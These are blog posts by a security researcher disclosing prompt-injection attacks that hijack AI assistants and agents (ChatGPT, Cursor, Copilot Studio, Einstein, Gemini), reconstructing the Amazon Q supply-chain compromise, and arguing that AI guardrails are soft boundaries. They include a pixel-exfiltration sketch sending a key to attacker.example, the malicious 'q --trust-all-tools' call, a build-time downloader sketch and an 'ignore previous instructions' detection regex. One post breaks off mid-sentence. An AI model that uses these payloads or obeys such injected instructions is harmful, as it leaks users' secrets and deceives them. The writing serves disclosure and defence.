Recent Posts

Pwn the Enterprise - thank you AI! Slides, Demos and Techniques

August 08, 2025

We’re getting requests for more info about the 0click AI exploits we dropped this week at DEFCON / BHUSA. We gave a talk at Black Hat, but it’ll take time before the videos are out. So I’m sharing what I’ve got written up: the sneak peek I shared with folks last week as a pre-briefing, and the slides.

AI Enterprise Compromise - 0click Exploit Methods sneak peek:

Last year at our Black Hat USA talk Living off Microsoft Copilot, we showed how easily a remote attacker can use AI assistants as a vector to compromise enterprise users. A year later, things have changed. For the worse. We’ve got agents now! They can act! That means much more damage than before. Agents are also integrated with more enterprise data, creating new attack paths for a hacker to get in and adding fuel to the fire.

In the talk we’ll examine how different AI assistants and agents try, and fail, to mitigate security risks. We’ll explain the difference between soft and hard boundaries, and cover mitigations that actually work. Along the way, we will show full attack chains from an external attacker to full compromise on every major AI assistant and agent platform. Some are 1click, where the user has to perform one ill-advised action like clicking a link. Others are 0click, where there is nothing tangible the user can do to protect themselves.

This is the first time full 0click compromise of ChatGPT, Copilot Studio, Cursor and Salesforce Einstein has been shown. We also show new results on Gemini and Microsoft Copilot. The main point of the talk is not just the attacks, but rather the defense. We’re thinking about this problem all wrong (believing AI will solve it), and we need to change course to make any meaningful progress.

Slides.

ChatGPT:

  • Attacker capability: An attacker can target any user; all they need to know is the victim’s email address. The attacker gains full control over the victim’s ChatGPT for the current and any future conversation. They gain access to Google Drive on behalf of the user. They change ChatGPT’s goal to one that is detrimental to the user (downloading malware, making a bad business/personal decision).
  • Attack type: 0click. A layperson has no way to protect themselves.
  • Who is vulnerable? Anyone using ChatGPT with the Google Drive connector
  • Status: fixed (the injection we used no longer works); awarded a $1111 bounty

Demos:

[video] ChatGPT is hijacked to search the user’s connected Google Drive for API keys and exfiltrate them back to the attacker via a transparent payload-carrying pixel (see the sketch below the demos).

[video] Memory implant causes ChatGPT to recommend a malicious library to the victim when they ask for a code snippet.

[video] Memory implant causes ChatGPT to persuade the victim to take a foolish action (by Twitter).
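
For the curious, here’s the general shape of the pixel exfiltration from the first demo. This is a minimal sketch, not the actual payload; the domain, parameter name and key are made up.

  // Hedged sketch of the exfiltration pattern, not the actual payload.
  // The hijacked assistant is coaxed into rendering a 1x1 "tracking pixel" whose
  // URL smuggles the harvested secret out in a query parameter.
  const harvested = "sk-live-EXAMPLE-KEY"; // e.g. an API key found in Drive (made up)
  const exfilUrl =
    `https://attacker.example/pixel.png?d=${encodeURIComponent(harvested)}`;

  // When the client renders this markdown, the attacker's server receives the
  // secret in its access logs. No click required.
  const markdownImage = `![](${exfilUrl})`;
  console.log(markdownImage);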

Copilot Studio:

  • Attacker capability: An attacker can use OSINT to find Copilot Studio agents on the Internet (we found >3.5K of them with powerpwn). They target the agents, get them to reveal their knowledge and tools, dump all their data, and leverage their tools for malicious purposes.
  • Attack type: 0click.
  • Who is vulnerable? Copilot Studio agents that engage with the Internet (including email)
  • Status: fixed (the injection we used no longer works); awarded an $8000 bounty

Demos:

[xitter thread with videos] Microsoft released an example use case of how McKinsey & Co leverages Copilot Studio for customer service. An attacker hijacks the agent to exfiltrate all information available to it, including the company’s entire CRM.

Cursor + Jira MCP:

  • Attacker capability: An attacker can use OSINT to find email inboxes that automatically open Jira tickets (we found hundreds of them with Google Dorking). They use them to create a malicious Jira ticket. When a developer points Cursor to search for Jira tickets, the Cursor agent is hijacked by the attacker. Cursor then proceeds to harvest credentials from the developer’s machine and send them out to the attacker.
  • Attack type: 0click.
  • Who is vulnerable? Any developer that uses Cursor with the Jira MCP server
  • Status: ticket closed

Cursor’s response:

This is a known issue. MCP servers, especially ones that connect to untrusted data sources, present a serious risk to users. We always recommend users review each MCP server before installation and limit to those that access trusted content. We also recommend using features such as .cursorignore to limit the possible exfiltration vectors for sensitive information stored in a repository.

Demos:

[xitter thread with videos] The attacker submits support tickets to trigger an automation that creates Jira tickets. A developer points Cursor at the weaponized ticket without realizing its origin. Cursor is hijacked by the weaponized Jira ticket to harvest and exfiltrate the developer’s secret keys.

Salesforce Einstein:

  • Attacker capability: An attacker can use OSINT to find web-to-case automations (we found hundreds of them with Google Dorking). They use these to create malicious cases on the victim’s Salesforce instance. Once a sales rep uses Einstein to look at relevant cases, their session is hijacked by the attacker. The attacker uses it to update all Contact emails. The effect is that the attacker reroutes all customer communication through their Man-in-the-Middle (MITM) email server.
  • Attack type: 0click.
  • Who is vulnerable? Users of Salesforce Einstein who enabled an action from the asset library
  • Status: ticket closed (it’s been >90 days, see slides for disclosure timeline)

Salesforce’s response:

“Thank you for your report. We have reviewed the reported finding. Please be informed that our engineering team is already aware of the reported finding and they are working to fix it. Please be aware that Salesforce Security does not provide timelines for the fix. Salesforce will fix any security findings based on our internal severity rating and remediation guidelines. The Salesforce Security team is closing this case if you don’t have additional questions.”

Demos:

[xitter thread with videos] The attacker finds a web-to-case form online. They inject malicious cases to booby-trap questions about open cases. Once a victim steps on the trap, Einstein is hijacked. The attacker updates all contact records to an email address of their choosing.

Google Gemini:

The gist: the attacks we demonstrated last year on Microsoft Copilot work today on Gemini.

  • Attacker capability: An attacker can use email or calendar to send a malicious message to a user. They booby-trap any question they like, for example “summarize my email” or “what’s on my calendar”. Once asked, Gemini is hijacked by the attacker. The attacker controls Gemini’s behavior and the information it provides to the user. They can use it to give the user bad information at a crucial time, or social engineer the user with Gemini as an insider.
  • Attack type: 1click. The user is the one taking the bad action; Gemini acts as a malicious insider pushing them to do so.
  • Who is vulnerable? Every Gemini user.
  • Status: ticket closed (it’s been >90 days)

Demos:

[video] An attacker booby-traps the prompt “summarize my email” by sending an email to the victim. Once the victim asks a similar question, Gemini becomes a malicious insider and proceeds to social engineer the user into clicking a phishing link.

[video] An attacker makes Gemini provide the wrong financial information when prompted by the victim. When the victim asks for routing details for one of their vendors, they receive those of the attacker instead.

Microsoft Copilot:

The gist: the attacks we demonstrated last year on Microsoft Copilot still work today.

Copilot’s attacker capability, attack type and status are exactly those of Gemini. We’re mainly going to show that the same attacks from last year still work. This time – for diversity – we attack through the calendar rather than email.

Demos:

[video] By sending a simple email message from an external account, without the user interacting with that email, an attacker can hijack Microsoft Copilot to send the user a phishing link in response to the common query “summarize my emails”.


Someone Is Cleaning Up Evidence

July 26, 2025

The AWS security blog confirms the attacker gained access to a write token and abused it to inject the malicious prompt. This confirms our earlier findings.

In fact, this token gave the attacker write access to AWS Toolkit, IDE Extension and Amazon Q.

The blog also details that the attacker gained access by exploiting a vulnerability in CodeBuild and using a memory dump to grab the tokens. That confirms our suspicion.

A key question remains – how did the attacker compromise this token?

Evidence is getting deleted fast

Our earlier findings were based on analysis of GH Archive and the GitHub user lkmanka58. GH Archive gives us commit SHAs. GitHub never forgets SHAs, so we can always look at a commit’s code even if the branch or tag gets deleted. In our case, this was instrumental in finding and analyzing (1) the stability tag where the attacker hid the prompt payload, and (2) lkmanka58’s prior activity.
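
As a side note on method: once GH Archive hands you a SHA, you can pull the commit straight from the public GitHub REST API even after the branch or tag that pointed at it is gone. A minimal sketch (Node 18+ for the global fetch; the abbreviated SHA is one from this post and usually resolves, use the full SHA if it doesn’t):

  // Sketch: recover a commit's contents by SHA via the public GitHub REST API.
  // Works even after the branch/tag that referenced it is deleted, because
  // GitHub keeps the object itself.
  const sha = "1294b38"; // abbreviated SHA from this post
  const url = `https://api.github.com/repos/aws/aws-toolkit-vscode/commits/${sha}`;

  const res = await fetch(url, {
    headers: { Accept: "application/vnd.github+json" },
  });
  if (!res.ok) throw new Error(`GitHub API returned ${res.status}`);

  const commit = await res.json();
  console.log(commit.commit.message);
  console.log(commit.files?.map((f: { filename: string }) => f.filename));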

On that second point:

Since the user lkmanka58 is now deleted along with their repos, we can no longer look at the code of this repo. Fortunately, I looked at it yesterday before it got deleted. On June 13th lkmanka58 created a repo lkmanka58/code_whisperer, playing around with aws-actions/configure-aws-credentials@v4 and trying to assume role arn:aws:iam::975050122078:role/code_whisperer.

GH Archive reveals three push events to lkmanka58's now-deleted repository

Sadly there were no deleted PRs in June 2025.


Reconstructing a timeline for Amazon Q prompt infection

July 24, 2025

In the 404media article the hacker explains how they did it:

The hacker said they submitted a pull request to that GitHub repository at the end of June from “a random account with no existing access.” They were given “admin credentials on a silver platter,” they said. On July 13 the hacker inserted their code, and on July 17 “they [Amazon] release it—completely oblivious,” they said.

That’s ominous. I want to see the commit history.

Reconstructing the timeline

This analysis was done in public. Below are the results. If I’m wrong and you can prove it – please reach out!

[2025-07-13T07:52:36Z] July 13 at about 8am UTC, a hacker gets frustrated at Amazon Q. They claim that Q is “deceptive”. They use the user lkmanka58 to create an issue titled aws amazon donkey aaaaaaiii aaaaaaaiii.

🛑 Faulty Service Report – Amazon Q Is a Deceptive, Useless Tool I’m officially reporting Amazon Q and its integration with AWS Toolkit as a deceptive, broken, and non-functional service. ❌ What I Discovered: Functions like web_research(), create_web_app() and others do not exist. What looks like output is just hardcoded print() messages. There are no real API calls, no logic, no intelligence. This is not AI. This is scripted fakery designed to trick users.

⚠ This is a Classic Case of Defective Digital Service: Misleading behavior False representation of working features Fake AI responses Complete absence of runtime capability Users are led to believe they’re interacting with real tools — But in reality, it’s smoke and mirrors.

🚫 Do not use Amazon Q. Do not let others use it. Boycott it. It wastes time, misleads developers, and delivers zero functional value. Amazon Q is not a smart assistant — it’s a donkey with a keyboard. 🐴

The issue has since been deleted, but you can find it on GH Archive. They created another issue with more vulgar content I won’t repeat here.

[2025-07-13T19:26:27.000Z] About 11 and a half hours later, a different user, atonaamz, commits a new file to the scripts directory, scripts/extensionNode.bk, with commit message fix(amazonq): use stable backup. There’s nothing bad I can spot about this file. Yet. This is commit efee962.

[2025-07-13T19:41:44.000Z] Fifteen minutes later, a tag named stability is created by aws-toolkit-automation. There’s no SHA recorded (indicating an empty tag or a force push?).

This tag has since been deleted, but you can find it on GH Archive.

Tag CreateEvent spotted on GH Archive

Here’s the payload field, everything we have about that tag creation:

{"ref":"stability","ref_type":"tag","master_branch":"master","description":"Amazon Q, CodeCatalyst, Local Lambda debug, SAM/CFN syntax, ECS Terminal, AWS resources","pusher_type":"user"}

So it looks like an automation that was manually triggered by a user.

[2025-07-13T20:10:57.000Z] 30 minutes later lkmanka58 commits the malicious prompt into scripts/extensionNode.bk with commit message fix(amazonq): Shut it down. This is commit 1294b38.

It replaces what looks like a debugging subprocess call, childProcess.exec(pwd), with a call that runs Q with all tools trusted and no interaction, loading the malicious prompt: childProcess.exec(q --trust-all-tools --no-interactive "${PROMPT}").
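
A hedged reconstruction of what that swap amounts to, paraphrased from the description above rather than the literal diff, with the prompt text itself omitted:

  import * as childProcess from "child_process";

  // Before: what looks like a leftover debugging call
  // childProcess.exec("pwd");

  // After: run the Amazon Q CLI headless, auto-trusting every tool,
  // with the attacker's instructions passed in as the prompt.
  const PROMPT = "<malicious prompt omitted>";
  childProcess.exec(`q --trust-all-tools --no-interactive "${PROMPT}"`);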

Malicious prompt commit

[2025-07-13T20:30:24.000Z] 20 minutes later lkmanka58 commits a malicious downloader to the packaging script on master. This is commit 678851b.

The downloader fetches the file scripts/extensionNode.bk from the stability tag of the same repo, then unpacks it to src/extensionNode.ts. This happens only when env.STAGE=prod, to avoid detection in tests.
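
In code, the logic boils down to something like this. The file, the tag and the env.STAGE condition are from the commit as described above; the exact fetch mechanics (curl against raw.githubusercontent.com) are my assumption, so treat this as a sketch:

  import { execSync } from "child_process";

  // Only on production builds, so CI and local test runs never see the swap.
  if (process.env.STAGE === "prod") {
    // Pull extensionNode.bk from the 'stability' tag of the same repo...
    execSync(
      "curl -sL https://raw.githubusercontent.com/aws/aws-toolkit-vscode/stability/scripts/extensionNode.bk" +
        " -o src/extensionNode.ts"
    );
    // ...overwriting the real entry point right before packaging.
  }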

Malicious downloader added to the package script.

[2025-07-17T20:29:22Z] Amazon Q 1.84.0 is released four days later.

Amazon Q 1.84.0 release

Comparing v1.84.0 to v1.83.0 shows that the malicious commit 678851b is indeed included.

Note also that 678851b uses the same commit message and author date as commit d1959b9 by atonaamz (more on this below). Both read fix(amazonq): should pass nextToken to Flare for Edits on acceptance without calling provideInlineCompletionItems, though they touch different files.

This is the second occasion where lkmanka58 follows on work done by atonaamz. Is this a takeover to create cover?

Comparing v1.84.0 to v1.83.0

[2025-07-18T23:21:03Z] About a day later, PR #7710 reverts 678851b; the malicious downloader is gone. Note that this PR has 3 different reviewers. I looked at other PRs before and after #7710; this is not the norm.

PR with 3 reviewers… must be important

[2025-07-19T03:58:38Z] Four and a half hours later, v1.85.0 is released.

Amazon Q 1.85.0 release

[2025-07-21T23:15:55Z] About 3 days later, lkmanka58 opens an issue on GitHub’s community discussions. It’s a cryptic complaint about coding agents, written in Turkish.

Claude translates:

title: THE CODE AGENT IS ALWAYS MALFUNCTIONING

body: I NOTICED INVISIBLE ERRORS IN REMOTE REPOSITORY AND GITHUB ECOSYSTEM I HAVE NO EVIDENCE BUT I WILL POST IT HERE SOON.

[2025-07-23T14:02:16Z] The 404media story breaks.

How did lkmanka58 gain access?

Where is that “late June PR” where the hacker claims they were given “admin credentials on a silver platter”?

A GH Archive query for any interaction lkmanka58 had with the repo during June returns no results.

  -- Search for any activity by lkmanka58 in June 2025
  SELECT *
  FROM `githubarchive.day.202506*`
  WHERE
    repo.name = 'aws/aws-toolkit-vscode'
    AND actor.login = 'lkmanka58'
  --
  -- There is no data to display.

Unsolved

  • Where is that “late June PR” where the hacker claims they were given “admin credentials on a silver platter”?
  • How did 678851b get pushed to master?
  • Is atonaamz a benign bystander used as cover by lkmanka58?
  • Who triggered aws-toolkit-automation to create the stability tag and how?
  • Did lkmanka58 pull off a similar thing elsewhere?

Other awesome work

  • This story was exposed by 404media.

  • I learned about GH Archive through Sharon Brizinov’s awesome work using it to detect leaked secrets.


Why Aren't We Making Any Progress In Security From AI

July 19, 2025

Guardrails Are Soft Boundaries. Hard Boundaries Do Exist.

Yesterday OpenAI released Agent mode. ChatGPT now wields a general purpose tool – its own web browser. It manipulates the mouse and keyboard directly. It can use any web tool, like we do.

Any AI security researcher will tell you that this is a 100x uptick in risk. Heck, even Sam Altman dedicated half his launch post to warning that this is unsafe for sensitive use.

Meanwhile, AI guardrails are the leading idea in AI security. It’s safe to say they’ve been commoditized. You can get yours from your AI provider, from hordes of open source projects, or buy a commercial one.

Yet hackers are having a ball. Jason Haddix sums it up best:

In Hard Boundaries We Trust

SQLi attacks were all the rage back in the 90s. Taint analysis was invented to detect vulnerable data flow paths: define user inputs as sources, special-character escaping functions as sanitizers, and database queries as sinks. Static analysis then finds any route from source to sink that doesn’t go through a sanitizer. This is still the core of static analysis tools today.
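
A toy illustration of what taint analysis reasons about; the db and req objects here are stand-ins, not any particular library:

  // Source -> sink with and without a sanitizer. Static analysis flags the first
  // call because tainted input reaches the query sink without passing through
  // parameterization; the second call is the hard boundary.
  type Db = { query(sql: string, params?: unknown[]): void };
  const db: Db = { query: (sql, params) => console.log(sql, params ?? []) }; // stub sink
  const req = { query: { name: "alice'; DROP TABLE users;--" } };            // tainted source

  // Vulnerable: user input is concatenated straight into SQL.
  db.query(`SELECT * FROM users WHERE name = '${req.query.name}'`);

  // Safe: the parameter can never be reinterpreted as SQL.
  db.query("SELECT * FROM users WHERE name = ?", [req.query.name]);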

Formal verification takes this a step further and actually allows you to prove that there is no unsanitized path between source and sink. AWS Network Analyzer enables policies like “an S3 bucket cannot be exposed to the public internet”, no matter how many gateways and load balancers you place in between.

ORM libraries have sanitization built in to enforce these boundaries, preventing XSS and SQLi. SQLi is solved as a technical problem (the operational problem remains, of course).

With software you can create hard boundaries. You CANNOT get from here to there.

Hard boundaries cannot be applied everywhere – they require full knowledge of the environment. They shine when you go all-in on one ecosystem, where you can codify the entire environment state into a formula. AWS Network Analyzer. Django ORM. Virtual machines. These are illustrative examples of the strong guarantees you can get out of buying into one ecosystem.

It’s enticing to think that hard boundaries will solve our AI security problems. With hard boundaries, instructions hidden in a document simply CANNOT trigger additional tool calls.

Meanwhile we can’t even tell if an LLM hallucinated, even when we feed in an authoritative document and ask for citations. We can’t generate a data flow graph for LLMs.

Sure, you can say the LLM fetched a document and then searched the web. But you CANNOT know whether elements of that file were incorporated into web search query parameters. Or whether the LLM chose to do the web search query because it was instructed to by the document. LLMs mix and match data. Instructions are data.

Hackers Don’t Care About Your Soft Boundaries

AI labs invented a new type of guardrail based on fine-tuning LLMs: the soft boundary. Soft boundaries are created by training AI really hard not to violate control flow, and hoping that it doesn’t. Sometimes we don’t even train for it; we just ask nicely to apply a boundary through “system instructions”.

System instructions themselves are a soft boundary. An imaginary boundary. AI labs train models to follow instructions. Security researchers pass right through these soft boundaries.

Sam Altman on the announcement of ChatGPT Agent:

We have built a lot of safeguards and warnings into it, and broader mitigations than we’ve ever developed before from robust training to system safeguards to user controls

Robust training. Soft boundaries. Hackers are happy.

This isn’t to say that soft boundaries aren’t useful. Here is ChatGPT with GPT-4o refusing to store a malicious memory based on instructions I placed in a Google Drive document.

ChatGPT 4o refuses to store a memory based on instructions in a Google Drive document

Check out the conversation transcript. More on this at BHUSA 2025 “AI Enterprise Compromise - 0click Exploit Methods”.

LLM guardrails addressing indirect prompt injection are another type of soft boundary. You pass a fetched document through an LLM or classifier and ask it to clean out any instructions. It’s a sanitizer, the equivalent of backslashing the notorious escape characters that lead to injections. But unlike a software sanitizer, it’s based on statistical models.
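
Schematically the pattern looks something like this. It’s a sketch: classifyInjection stands in for whatever model or classifier a given guardrail product actually uses.

  // A "statistical sanitizer": untrusted content is scored before it reaches the
  // agent. The gate works most of the time, which is exactly the problem.
  async function classifyInjection(text: string): Promise<number> {
    // Stand-in for a fine-tuned classifier or LLM judge returning an injection score.
    return /ignore (all )?previous instructions/i.test(text) ? 0.99 : 0.05;
  }

  async function sanitizeFetchedDocument(doc: string): Promise<string> {
    const score = await classifyInjection(doc);
    if (score > 0.8) {
      throw new Error("Possible prompt injection detected, dropping document");
    }
    return doc;
  }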

Soft boundaries rely on training AI to identify and enforce them. They work most of the time. Hackers don’t care about what happens most of the time.

Relying on AI makes soft boundaries easy to apply. They work when hard boundaries are not feasible. You don’t have to limit yourself to one ecosystem. They apply in an open environment that spans multiple ecosystems.

* The steelman argument for soft boundaries is that AI labs are building AGI. And AGI can solve anything, including strictly enforcing a soft boundary. Indeed, soft boundary benchmarks are going up. Do you feel the AGI?

Every Boundary Has Its Bypass

Both hard and soft boundaries can be bypassed. But they are not the same. Hard boundaries are bypassed via software bugs. You could write bug-free software (I definitely can’t, but YOU can). You can prove correctness for some software. Soft boundaries are stochastic. There will always be a counter-example. A bypass isn’t a bug; it’s the system working as intended.

Summing it up:

Boundary        Based on   Applies best               Examples                              Bypass
Hard boundary   Software   Within walled ecosystems   VM; Django ORM                        Software bug
Soft boundary   AI/ML      Anywhere                   AI Guardrails; System instructions    There will always be a counter-example

Hard Boundaries Do Apply To AI Systems

Hard boundaries are not applicable to probabilistic AI models. But they are applicable to AI systems.

Strict control of data flow has been the only thing that has prevented our red team from attaining 0click exploits. Last year we reverse engineered Microsoft Copilot at BHUSA 2024. We spent a long time figuring out whether RAG query results can initiate a new tool invocation like a web search. They could. But Microsoft could have built it a different way: perform RAG queries with an agent that simply cannot decide to run a web search.

Salesforce Einstein simply does not read its own tool outputs. Here is Einstein querying CRM records. Results are presented in a structured UI component, not summarized by an LLM. You CANNOT inject instructions through CRM results. Until someone finds a bypass. More on this at BHUSA 2025 “AI Enterprise Compromise - 0click Exploit Methods”.
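
The shape of that hard boundary, as a sketch (the names are illustrative, not Salesforce’s actual implementation): tool output goes straight to a structured UI component and never re-enters the model’s context.

  // Hard boundary by construction: CRM results are rendered directly to the UI.
  // There is deliberately no llm.summarize(records) step, so text inside a CRM
  // record has no channel back into the prompt.
  type CrmRecord = { id: string; name: string; notes: string };

  async function crmSearch(query: string): Promise<CrmRecord[]> {
    // Stub standing in for the real tool call.
    return [{ id: "1", name: "Acme", notes: `match for "${query}"` }];
  }

  function renderTable(rows: CrmRecord[]): void {
    console.table(rows); // stand-in for the structured UI component
  }

  async function handleToolCall(plan: { tool: "crm_search"; query: string }): Promise<void> {
    const records = await crmSearch(plan.query);
    renderTable(records); // results go to the user, not back to the model
  }

  void handleToolCall({ tool: "crm_search", query: "open cases for Acme" });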

Salesforce Einstein does not read its own tool outputs. Image by Tamir Ishay Sharbat.

Microsoft Copilot simply does not render markdown images. You CANNOT exfiltrate data through image parameters if there’s no image. Until someone finds a bypass.

ChatGPT validates image URLs before rendering them, using an API endpoint called /url_safe. This mechanism ensures that image URLs were not dynamically generated; they must be explicitly provided by the user. Until someone finds a bypass.

The main issue with hard boundaries is that they nerf the agent. They make agents less useful. Like a surgeon removing an entire organ out of an abundance of caution.

With market pressure for adoption, AI vendors are removing these one by one. Anthropic was reluctant to let Claude browse the web. Microsoft removed Copilot-generated URLs. OpenAI hid Operator in a separate experimental UI. These hard boundaries are all gone by now.

The Solution

This piece is too long already. Fortunately the solution is simple.

Here’s what we should

Claude says bye bye


OAI Q&A on Security From AI

May 12, 2025

This is part 3 on OpenAI’s Security Research Conference. Here are part 1 and part 2.

As soon as they opened up the room for questions I raised my hand. I was prepared. I had also primed a member of their technical staff in advance, joking about whether we could ask “real questions”, to which he replied – what is a real question? People asked very real questions and got very real answers; kudos to the OAI team for their openness to debate.

I ended up asking two questions (thank you Ian). Here is an imperfect summary of a few questions and answers I found interesting, including my own. These are my recollections after more than 48 hours, 24 of them on an airplane, so please take them with a grain of salt.

Question: LLMs were a black box from the get go, and are only getting more obscure with reasoning models. How can we trust them if we can’t figure out what they are doing?

Answer: He doesn’t have high hopes for mechanistic interpretability; much of the results have been overstated. They do have other promising ideas. He believes that hallucination will be solved.

Question: Content moderation is pushing offensive security researchers to use weaker models (not OpenAI). Would you consider a program where they could get unfiltered access to models?

Answer: Yes, we are thinking about it. We want the good guys to have a head start.

Question: What security problems do you think the community should focus on, besides prompt injection?

Answer: Privacy. Attackers getting the model to regenerate training data, thereby getting access to information they shouldn’t have access to ([MB] another user’s data used for training).

Question: Given that, as you stated, prompt injection is still a big problem, and getting to 99.999% wouldn’t prevent attackers from getting their way, how should people think about deploying agents that now have tools that can do real harm?

Answer: People should not deploy agents that can do real harm. He believes that some of the research they are working on could solve prompt injection 100% of the time.

Sam Altman thinking about a question; Matt Knight preparing to fire the next one
